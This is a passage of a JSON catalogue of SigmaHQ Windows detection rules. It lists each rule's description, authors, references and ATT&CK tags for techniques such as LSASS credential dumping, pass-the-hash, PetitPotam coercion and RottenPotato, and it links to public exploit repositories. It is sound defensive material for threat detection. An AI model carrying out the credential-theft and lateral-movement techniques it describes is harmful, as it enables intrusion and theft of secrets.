"Detects when the password policy is enumerated.", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-19", "falsepositive": [ "No established falsepositives" ], "filename": "win_security_password_policy_enumerated.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_password_policy_enumerated.yml" ], "tags": [ "attack.discovery", "attack.t1201" ] }, "related": [ { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12ba6a38-adb3-4d6b-91ba-a7fb248e3199", "value": "Password Policy Enumerated" }, { "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. 
This could be a sign of tampered binaries.\n", "meta": { "author": "Thomas Patzke", "creation_date": "2019-12-03", "falsepositive": [ "Disk device errors" ], "filename": "win_security_codeintegrity_check_failure.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.001" ] }, "related": [ { "dest-uuid": "5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", "value": "Failed Code Integrity Checks" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "value": "Invoke-Obfuscation Via Use Rundll32 - Security" }, { "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", "meta": { "author": "elhoim", "creation_date": "2022-09-09", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_computer_name.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1511760068743766026", "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" ], "tags": [ "cve.2021-42278", "cve.2021-42287", "attack.persistence", "attack.privilege-escalation", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", "value": "Win Susp Computer Name Containing Samtheadmin" }, { "description": "Detect PetitPotam coerced authentication activity.", "meta": { "author": "Mauricio Velazco, Michael Haag", "creation_date": "2021-09-02", "falsepositive": [ "Unknown. Feedback welcomed." 
], "filename": "win_security_petitpotam_network_share.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/topotam/PetitPotam", "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" ], "tags": [ "attack.credential-access", "attack.t1187" ] }, "related": [ { "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "value": "Possible PetitPotam Coerce Authentication Attempt" }, { "description": "Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.\n", "meta": { "author": "@BarryShooshooga", "creation_date": "2019-10-26", "falsepositive": [ "Intended exclusions by administrators" ], "filename": "win_security_windows_defender_exclusions_registry_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46a68649-f218-4f86-aea1-16a759d81820", "value": "Windows Defender Exclusion List Modified" }, { 
"description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code into kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes that are allowed to do so, you may be left with malicious programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools, so you have to work with an allowlist to find the bad stuff.\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019-04-08", "falsepositive": [ "Other legitimate tools loading drivers, including but not limited to Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good approach is to exclude users who are allowed to load drivers." 
], "filename": "win_security_user_driver_loaded.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673", "https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f63508a0-c809-4435-b3be-ed819394d612", "value": "Potential Privileged System Service Operation - SeLoadDriverPrivilege" }, { "description": "Detects Windows Security events that are generated when the hacktool Ruler by SensePost is used", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-31", "falsepositive": [ "Go utilities that use the staaldraad go-ntlm library" ], "filename": "win_security_alert_ruler.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/sensepost/ruler", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624", "https://github.com/sensepost/ruler/issues/47", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776", "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1087", "attack.t1114", "attack.t1059", "attack.t1550.002" ] }, "related": [ { 
"dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24549159-ac1b-479c-8175-d42aea947cae", "value": "Hacktool Ruler" }, { "description": "Detects NetNTLM downgrade attack", "meta": { "author": "Florian Roth (Nextron Systems), wagga", "creation_date": "2018-03-20", "falsepositive": [ "Unknown" ], "filename": "win_security_net_ntlm_downgrade.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1112" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "value": "NetNTLM Downgrade Attack" }, { "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-09", "falsepositive": [ "Legitimate use of encrypted ZIP files" ], "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" ], "tags": [ "attack.defense-evasion", "attack.initial-access", "attack.t1027", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "571498c8-908e-40b4-910b-d2369159a3da", "value": "Password Protected ZIP File Opened (Email Attachment)" }, { "description": "Detects reconnaissance of privileged users or groups based on event ID 4661 and the SIDs of known privileged users or groups", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Enumeration by administrative accounts; if the source account is not an administrator, the activity is highly suspicious" ], "filename": "win_security_account_discovery.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "value": "AD Privileged Users or Groups Reconnaissance" }, { "description": "Detects process handle on LSASS process with certain access mask", "meta": { "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "filename": "win_security_susp_lsass_dump_generic.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ "attack.credential-access", "car.2019-04-004", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "value": "Potentially Suspicious AccessMask Requested From LSASS" }, { "description": "Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-14", "falsepositive": [ "Legitimate administrative activity" ], "filename": "win_security_user_added_to_local_administrators.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732", "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1078", "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", "value": "User Added to Local Administrator Group" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "value": "Invoke-Obfuscation 
Obfuscated IEX Invocation - Security" }, { "description": "Detects update to a scheduled task event that contain suspicious keywords.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_scheduled_task_update.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", "value": "Suspicious Scheduled Task Update" }, { "description": "Detects scenarios where system auditing for important events such as \"Process Creation\" or \"Logon\" events is disabled.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Unlikely" ], "filename": "win_security_disable_event_auditing_critical.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md", "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1", "value": "Important Windows Event Auditing Disabled" }, { "description": "Detects non-system users failing to get a handle of the SCM database.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-12", "falsepositive": [ "Unknown" ], "filename": "win_security_scm_database_handle_failure.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" ], "tags": [ "attack.discovery", "attack.t1010" ] }, "related": [ { "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", "value": "SCM Database Handle Failure" }, { "description": "Detects successful logon attempts performed with WMI", "meta": { "author": "Thomas Patzke", "creation_date": "2019-12-04", "falsepositive": [ "Monitoring tools", "Legitimate system administration" ], "filename": "win_security_susp_wmi_login.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", "value": "Successful Account Login Via WMI" }, { "description": "Detects logon events that have 
characteristics of events generated during an attack with RottenPotato and the like", "meta": { "author": "@SBousseaden, Florian Roth", "creation_date": "2019-11-15", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_rottenpotato.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1195284233729777665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "value": "RottenPotato Like Attack Pattern" }, { "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.", "meta": { "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate or intentional inbound connections from public IP addresses on the SMB port." 
], "filename": "win_security_successful_external_remote_smb_login.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1133", "attack.t1078", "attack.t1110" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78d5cab4-557e-454f-9fb9-a222bd0d5edc", "value": "External Remote SMB Logon from Public IP" }, { "description": "RDP login with localhost source address may be a tunnelled login", "meta": { "author": "Thomas Patzke", "creation_date": "2019-01-28", "falsepositive": [ "Unknown" ], "filename": "win_security_rdp_localhost_login.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml" ], "tags": [ "attack.lateral-movement", "car.2013-07-002", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", "value": "RDP Login from Localhost" }, { "description": "Detect remote login by Administrator user (depending on internal pattern).", "meta": { "author": "juju4", "creation_date": "2017-10-29", "falsepositive": [ "Legitimate administrative activity." ], "filename": "win_security_admin_rdp_login.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://car.mitre.org/wiki/CAR-2016-04-005", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml" ], "tags": [ "attack.lateral-movement", "attack.t1078.001", "attack.t1078.002", "attack.t1078.003", "car.2016-04-005" ] }, "related": [ { "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", "value": "Admin User Remote Logon" }, { "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", "meta": { "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "creation_date": "2019-06-02", "falsepositive": [ "Unlikely" ], "filename": "win_security_rdp_bluekeep_poc_scanner.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708", "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml" ], "tags": [ "attack.lateral-movement", "attack.t1210", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8400629e-79a9-4737-b387-5db940ab2367", "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" }, { "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", "meta": { "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "creation_date": "2018-02-12", "falsepositive": [ "Runas command-line tool using /netonly parameter" ], "filename": "win_security_overpass_the_hash.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml" ], "tags": [ "attack.lateral-movement", "attack.s0002", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", "value": "Successful Overpass the Hash Attempt" }, { "description": "Detects a failed logon attempt from a public IP. 
A login from a public IP can indicate a misconfigured firewall or network boundary.", "meta": { "author": "NVISO", "creation_date": "2020-05-06", "falsepositive": [ "Legitimate logon attempts over the internet", "IPv4-to-IPv6 mapped IPs" ], "filename": "win_security_susp_failed_logon_source.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.t1078", "attack.t1190", "attack.t1133" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "value": "Failed Logon From Public IP" }, { "description": "Detects potential token impersonation and theft. 
Example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".", "meta": { "author": "Michaela Adams, Zach Mathis", "creation_date": "2022-11-06", "falsepositive": [ "Anti-Virus" ], "filename": "win_security_access_token_abuse.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1134.001", "stp.4u" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "value": "Potential Access Token Abuse" }, { "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unlikely" ], "filename": "win_security_diagtrack_eop_default_login_username.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", "value": "DiagTrackEoP Default Login Username" }, { "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", "meta": { 
"author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "creation_date": "2019-06-14", "falsepositive": [ "Administrator activity" ], "filename": "win_security_pass_the_hash_2.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml" ], "tags": [ "attack.lateral-movement", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", "value": "Pass the Hash Activity 2" }, { "description": "Detects activity when a security-enabled global group is deleted", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2023-04-26", "falsepositive": [ "Unknown" ], "filename": "win_security_security_enabled_global_group_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", 